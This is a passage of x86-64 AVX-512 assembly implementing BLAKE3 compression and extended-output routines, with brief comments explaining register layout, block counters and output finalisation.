vshufps ymm8, ymm6, ymm7, 250
vpblendd ymm9, ymm9, ymm8, 0xAA
vpunpcklqdq ymm8, ymm7, ymm5
vpblendd ymm8, ymm8, ymm6, 0x88
vpshufd ymm8, ymm8, 0x78
vpunpckhdq ymm5, ymm5, ymm7
vpunpckldq ymm6, ymm6, ymm5
vpshufd ymm7, ymm6, 0x1E
vmovdqa ymm5, ymm9
vmovdqa ymm6, ymm8
jmp 9b
9:
vpxor ymm0, ymm0, ymm2
vpxor ymm1, ymm1, ymm3
mov eax, r13d
cmp rdx, r15
jne 2b
vmovdqu xmmword ptr [rbx], xmm0
vmovdqu xmmword ptr [rbx+0x10], xmm1
vextracti128 xmmword ptr [rbx+0x20], ymm0, 0x01
vextracti128 xmmword ptr [rbx+0x30], ymm1, 0x01
vmovdqa xmm0, xmmword ptr [rsp]
vmovdqa xmm2, xmmword ptr [rsp+0x4*0x10]
vmovdqu32 xmm0 {k1}, xmmword ptr [rsp+0x8]
vmovdqu32 xmm2 {k1}, xmmword ptr [rsp+0x48]
vmovdqa xmmword ptr [rsp], xmm0
vmovdqa xmmword ptr [rsp+0x4*0x10], xmm2
add rbx, 64
add rdi, 16
sub rsi, 2
3:
test esi, 0x1
je 4b
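// One input left: plain single-lane 128-bit compression.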
vmovdqu xmm0, xmmword ptr [rcx]
vmovdqu xmm1, xmmword ptr [rcx+0x10]
vmovd xmm14, dword ptr [rsp]
vpinsrd xmm14, xmm14, dword ptr [rsp+0x40], 1
vpinsrd xmm14, xmm14, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
vmovdqa xmm15, xmmword ptr [BLAKE3_IV+rip]
mov r8, qword ptr [rdi]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
.p2align 5
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
vpinsrd xmm3, xmm14, eax, 3
vmovdqa xmm2, xmm15
vmovups xmm8, xmmword ptr [r8+rdx-0x40]
vmovups xmm9, xmmword ptr [r8+rdx-0x30]
vshufps xmm4, xmm8, xmm9, 136
vshufps xmm5, xmm8, xmm9, 221
vmovups xmm8, xmmword ptr [r8+rdx-0x20]
vmovups xmm9, xmmword ptr [r8+rdx-0x10]
vshufps xmm6, xmm8, xmm9, 136
vshufps xmm7, xmm8, xmm9, 221
vpshufd xmm6, xmm6, 0x93
vpshufd xmm7, xmm7, 0x93
mov al, 7
9:
vpaddd xmm0, xmm0, xmm4
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 16
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 12
vpaddd xmm0, xmm0, xmm5
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 8
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 7
vpshufd xmm0, xmm0, 0x93
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x39
vpaddd xmm0, xmm0, xmm6
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 16
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 12
vpaddd xmm0, xmm0, xmm7
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 8
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 7
vpshufd xmm0, xmm0, 0x39
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x93
dec al
jz 9f
vshufps xmm8, xmm4, xmm5, 214
vpshufd xmm9, xmm4, 0x0F
vpshufd xmm4, xmm8, 0x39
vshufps xmm8, xmm6, xmm7, 250
vpblendd xmm9, xmm9, xmm8, 0xAA
vpunpcklqdq xmm8, xmm7, xmm5
vpblendd xmm8, xmm8, xmm6, 0x88
vpshufd xmm8, xmm8, 0x78
vpunpckhdq xmm5, xmm5, xmm7
vpunpckldq xmm6, xmm6, xmm5
vpshufd xmm7, xmm6, 0x1E
vmovdqa xmm5, xmm9
vmovdqa xmm6, xmm8
jmp 9b
9:
vpxor xmm0, xmm0, xmm2
vpxor xmm1, xmm1, xmm3
mov eax, r13d
cmp rdx, r15
jne 2b
vmovdqu xmmword ptr [rbx], xmm0
vmovdqu xmmword ptr [rbx+0x10], xmm1
jmp 4b
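// blake3_compress_in_place_avx512(cv, block, block_len, counter, flags):
// System V args rdi=cv, rsi=block, dl=block_len, rcx=counter, r8b=flags.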
.p2align 6
_blake3_compress_in_place_avx512:
blake3_compress_in_place_avx512:
_CET_ENDBR
vmovdqu xmm0, xmmword ptr [rdi]
vmovdqu xmm1, xmmword ptr [rdi+0x10]
movzx eax, r8b
movzx edx, dl
shl rax, 32
add rdx, rax
vmovq xmm3, rcx
vmovq xmm4, rdx
vpunpcklqdq xmm3, xmm3, xmm4
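// xmm3 now holds state row 3: counter_lo, counter_hi, block_len, flags.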
vmovaps xmm2, xmmword ptr [BLAKE3_IV+rip]
vmovups xmm8, xmmword ptr [rsi]
vmovups xmm9, xmmword ptr [rsi+0x10]
vshufps xmm4, xmm8, xmm9, 136
vshufps xmm5, xmm8, xmm9, 221
vmovups xmm8, xmmword ptr [rsi+0x20]
vmovups xmm9, xmmword ptr [rsi+0x30]
vshufps xmm6, xmm8, xmm9, 136
vshufps xmm7, xmm8, xmm9, 221
vpshufd xmm6, xmm6, 0x93
vpshufd xmm7, xmm7, 0x93
mov al, 7
9:
vpaddd xmm0, xmm0, xmm4
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 16
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 12
vpaddd xmm0, xmm0, xmm5
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 8
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 7
vpshufd xmm0, xmm0, 0x93
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x39
vpaddd xmm0, xmm0, xmm6
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 16
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 12
vpaddd xmm0, xmm0, xmm7
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 8
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 7
vpshufd xmm0, xmm0, 0x39
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x93
dec al
jz 9f
vshufps xmm8, xmm4, xmm5, 214
vpshufd xmm9, xmm4, 0x0F
vpshufd xmm4, xmm8, 0x39
vshufps xmm8, xmm6, xmm7, 250
vpblendd xmm9, xmm9, xmm8, 0xAA
vpunpcklqdq xmm8, xmm7, xmm5
vpblendd xmm8, xmm8, xmm6, 0x88
vpshufd xmm8, xmm8, 0x78
vpunpckhdq xmm5, xmm5, xmm7
vpunpckldq xmm6, xmm6, xmm5
vpshufd xmm7, xmm6, 0x1E
vmovdqa xmm5, xmm9
vmovdqa xmm6, xmm8
jmp 9b
9:
vpxor xmm0, xmm0, xmm2
vpxor xmm1, xmm1, xmm3
vmovdqu xmmword ptr [rdi], xmm0
vmovdqu xmmword ptr [rdi+0x10], xmm1
ret
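// blake3_compress_xof_avx512: same compression, but writes the full
// 64-byte extended output to r9 instead of updating cv in place.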
.p2align 6
_blake3_compress_xof_avx512:
blake3_compress_xof_avx512:
_CET_ENDBR
vmovdqu xmm0, xmmword ptr [rdi]
vmovdqu xmm1, xmmword ptr [rdi+0x10]
movzx eax, r8b
movzx edx, dl
shl rax, 32
add rdx, rax
vmovq xmm3, rcx
vmovq xmm4, rdx
vpunpcklqdq xmm3, xmm3, xmm4
vmovaps xmm2, xmmword ptr [BLAKE3_IV+rip]
vmovups xmm8, xmmword ptr [rsi]
vmovups xmm9, xmmword ptr [rsi+0x10]
vshufps xmm4, xmm8, xmm9, 136
vshufps xmm5, xmm8, xmm9, 221
vmovups xmm8, xmmword ptr [rsi+0x20]
vmovups xmm9, xmmword ptr [rsi+0x30]
vshufps xmm6, xmm8, xmm9, 136
vshufps xmm7, xmm8, xmm9, 221
vpshufd xmm6, xmm6, 0x93
vpshufd xmm7, xmm7, 0x93
mov al, 7
9:
vpaddd xmm0, xmm0, xmm4
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 16
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 12
vpaddd xmm0, xmm0, xmm5
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 8
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 7
vpshufd xmm0, xmm0, 0x93
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x39
vpaddd xmm0, xmm0, xmm6
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 16
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 12
vpaddd xmm0, xmm0, xmm7
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 8
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 7
vpshufd xmm0, xmm0, 0x39
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x93
dec al
jz 9f
vshufps xmm8, xmm4, xmm5, 214
vpshufd xmm9, xmm4, 0x0F
vpshufd xmm4, xmm8, 0x39
vshufps xmm8, xmm6, xmm7, 250
vpblendd xmm9, xmm9, xmm8, 0xAA
vpunpcklqdq xmm8, xmm7, xmm5
vpblendd xmm8, xmm8, xmm6, 0x88
vpshufd xmm8, xmm8, 0x78
vpunpckhdq xmm5, xmm5, xmm7
vpunpckldq xmm6, xmm6, xmm5
vpshufd xmm7, xmm6, 0x1E
vmovdqa xmm5, xmm9
vmovdqa xmm6, xmm8
jmp 9b
9:
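// Finalize the XOF block: rows 0-1 give bytes 0-31; rows 2-3, XORed with
// the input CV, give bytes 32-63.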
vpxor xmm0, xmm0, xmm2
vpxor xmm1, xmm1, xmm3
vpxor xmm2, xmm2, [rdi]
vpxor xmm3, xmm3, [rdi+0x10]
vmovdqu xmmword ptr [r9], xmm0
vmovdqu xmmword ptr [r9+0x10], xmm1
vmovdqu xmmword ptr [r9+0x20], xmm2
vmovdqu xmmword ptr [r9+0x30], xmm3
ret
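// blake3_xof_many_avx512: produce the requested number of consecutive
// 64-byte XOF blocks (count passed on the stack); a single block takes
// the scalar path below, larger requests the wide path at 2:.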
.p2align 6
blake3_xof_many_avx512:
_blake3_xof_many_avx512:
_CET_ENDBR
mov r10,QWORD PTR [rsp+0x8]
cmp r10,0x1
ja 2f
vmovdqu xmm0,XMMWORD PTR [rdi]
vmovdqu xmm1,XMMWORD PTR [rdi+0x10]
movzx eax,r8b
movzx edx,dl
shl rax,0x20
add rdx,rax
vmovq xmm3,rcx
vmovq xmm4,rdx
vpunpcklqdq xmm3,xmm3,xmm4
vmovaps xmm2,XMMWORD PTR [BLAKE3_IV+rip]
vmovups xmm8,XMMWORD PTR [rsi]
vmovups xmm9,XMMWORD PTR [rsi+0x10]
vshufps xmm4,xmm8,xmm9,0x88
vshufps xmm5,xmm8,xmm9,0xdd
vmovups xmm8,XMMWORD PTR [rsi+0x20]
vmovups xmm9,XMMWORD PTR [rsi+0x30]
vshufps xmm6,xmm8,xmm9,0x88
vshufps xmm7,xmm8,xmm9,0xdd
vpshufd xmm6,xmm6,0x93
vpshufd xmm7,xmm7,0x93
mov al,0x7
3:
vpaddd xmm0,xmm0,xmm4
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x10
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0xc
vpaddd xmm0,xmm0,xmm5
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x8
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0x7
vpshufd xmm0,xmm0,0x93
vpshufd xmm3,xmm3,0x4e
vpshufd xmm2,xmm2,0x39
vpaddd xmm0,xmm0,xmm6
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x10
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0xc
vpaddd xmm0,xmm0,xmm7
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x8
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0x7
vpshufd xmm0,xmm0,0x39
vpshufd xmm3,xmm3,0x4e
vpshufd xmm2,xmm2,0x93
dec al
je 3f
vshufps xmm8,xmm4,xmm5,0xd6
vpshufd xmm9,xmm4,0xf
vpshufd xmm4,xmm8,0x39
vshufps xmm8,xmm6,xmm7,0xfa
vpblendd xmm9,xmm9,xmm8,0xaa
vpunpcklqdq xmm8,xmm7,xmm5
vpblendd xmm8,xmm8,xmm6,0x88
vpshufd xmm8,xmm8,0x78
vpunpckhdq xmm5,xmm5,xmm7
vpunpckldq xmm6,xmm6,xmm5
vpshufd xmm7,xmm6,0x1e
vmovdqa xmm5,xmm9
vmovdqa xmm6,xmm8
jmp 3b
3:
vpxor xmm0,xmm0,xmm2
vpxor xmm1,xmm1,xmm3
vpxor xmm2,xmm2,XMMWORD PTR [rdi]
vpxor xmm3,xmm3,XMMWORD PTR [rdi+0x10]
vmovdqu XMMWORD PTR [r9],xmm0
vmovdqu XMMWORD PTR [r9+0x10],xmm1
vmovdqu XMMWORD PTR [r9+0x20],xmm2
vmovdqu XMMWORD PTR [r9+0x30],xmm3
ret
.p2align 6
2:
push rbp
mov rbp,rsp
sub rsp,0x90
and rsp,0xffffffffffffffc0
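// Align the stack to 64 bytes for the aligned zmm counter spills below.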
vpbroadcastd zmm0,ecx
shr rcx,0x20
vpbroadcastd zmm1,ecx
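// Build 16 consecutive 64-bit block counters: the low words get +0..15
// (ADD0), and lanes whose low word wrapped carry +1 (ADD1) into the highs.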
vpaddd zmm2,zmm0,ZMMWORD PTR [ADD0+rip]
vpcmpltud k1,zmm2,zmm0
vpaddd zmm1{k1},zmm1,DWORD PTR [ADD1+rip]{1to16}
vmovdqa32 ZMMWORD PTR [rsp],zmm2
vmovdqa32 ZMMWORD PTR [rsp+0x40],zmm1
cmp r10,0x10
jb 2f
3:
vpbroadcastd zmm16,DWORD PTR [rsi]
vpbroadcastd zmm17,DWORD PTR [rsi+0x4]
vpbroadcastd zmm18,DWORD PTR [rsi+0x8]
vpbroadcastd zmm19,DWORD PTR [rsi+0xc]
vpbroadcastd zmm20,DWORD PTR [rsi+0x10]
vpbroadcastd zmm21,DWORD PTR [rsi+0x14]
vpbroadcastd zmm22,DWORD PTR [rsi+0x18]
vpbroadcastd zmm23,DWORD PTR [rsi+0x1c]
vpbroadcastd zmm24,DWORD PTR [rsi+0x20]
vpbroadcastd zmm25,DWORD PTR [rsi+0x24]
vpbroadcastd zmm26,DWORD PTR [rsi+0x28]
vpbroadcastd zmm27,DWORD PTR [rsi+0x2c]
vpbroadcastd zmm28,DWORD PTR [rsi+0x30]
vpbroadcastd zmm29,DWORD PTR [rsi+0x34]
vpbroadcastd zmm30,DWORD PTR [rsi+0x38]
vpbroadcastd zmm31,DWORD PTR [rsi+0x3c]
vpbroadcastd zmm0,DWORD PTR [rdi]
vpbroadcastd zmm1,DWORD PTR [rdi+0x4]
vpbroadcastd zmm2,DWORD PTR [rdi+0x8]
vpbroadcastd zmm3,DWORD PTR [rdi+0xc]
vpbroadcastd zmm4,DWORD PTR [rdi+0x10]
vpbroadcastd zmm5,DWORD PTR [rdi+0x14]
vpbroadcastd zmm6,DWORD PTR [rdi+0x18]
vpbroadcastd zmm7,DWORD PTR [rdi+0x1c]
vpbroadcastd zmm8,DWORD PTR [BLAKE3_IV_0+rip]
vpbroadcastd zmm9,DWORD PTR [BLAKE3_IV_1+rip]
vpbroadcastd zmm10,DWORD PTR [BLAKE3_IV_2+rip]
vpbroadcastd zmm11,DWORD PTR [BLAKE3_IV_3+rip]
vmovdqa32 zmm12,ZMMWORD PTR [rsp]
vmovdqa32 zmm13,ZMMWORD PTR [rsp+0x40]
vpbroadcastd zmm14,edx
vpbroadcastd zmm15,r8d
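// Transposed layout: each zmm holds one 32-bit word across 16 lanes.
// zmm0-7 = CV, zmm8-11 = IV, zmm12-13 = counter lo/hi, zmm14 = block_len,
// zmm15 = flags; zmm16-31 carry the 16 message words.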
vpaddd zmm0,zmm0,zmm16
vpaddd zmm1,zmm1,zmm18
vpaddd zmm2,zmm2,zmm20
vpaddd zmm3,zmm3,zmm22
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm17
vpaddd zmm1,zmm1,zmm19
vpaddd zmm2,zmm2,zmm21
vpaddd zmm3,zmm3,zmm23
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm24
vpaddd zmm1,zmm1,zmm26
vpaddd zmm2,zmm2,zmm28
vpaddd zmm3,zmm3,zmm30
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm25
vpaddd zmm1,zmm1,zmm27
vpaddd zmm2,zmm2,zmm29
vpaddd zmm3,zmm3,zmm31
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
vpaddd zmm0,zmm0,zmm18
vpaddd zmm1,zmm1,zmm19
vpaddd zmm2,zmm2,zmm23
vpaddd zmm3,zmm3,zmm20
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm22
vpaddd zmm1,zmm1,zmm26
vpaddd zmm2,zmm2,zmm16
vpaddd zmm3,zmm3,zmm29
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm17
vpaddd zmm1,zmm1,zmm28
vpaddd zmm2,zmm2,zmm25
vpaddd zmm3,zmm3,zmm31
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm27
vpaddd zmm1,zmm1,zmm21
vpaddd zmm2,zmm2,zmm30
vpaddd zmm3,zmm3,zmm24
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
vpaddd zmm0,zmm0,zmm19
vpaddd zmm1,zmm1,zmm26
vpaddd zmm2,zmm2,zmm29
vpaddd zmm3,zmm3,zmm23
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm20
vpaddd zmm1,zmm1,zmm28
vpaddd zmm2,zmm2,zmm18
vpaddd zmm3,zmm3,zmm30
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm22
vpaddd zmm1,zmm1,zmm25
vpaddd zmm2,zmm2,zmm27
vpaddd zmm3,zmm3,zmm24
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm21
vpaddd zmm1,zmm1,zmm16
vpaddd zmm2,zmm2,zmm31
vpaddd zmm3,zmm3,zmm17
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
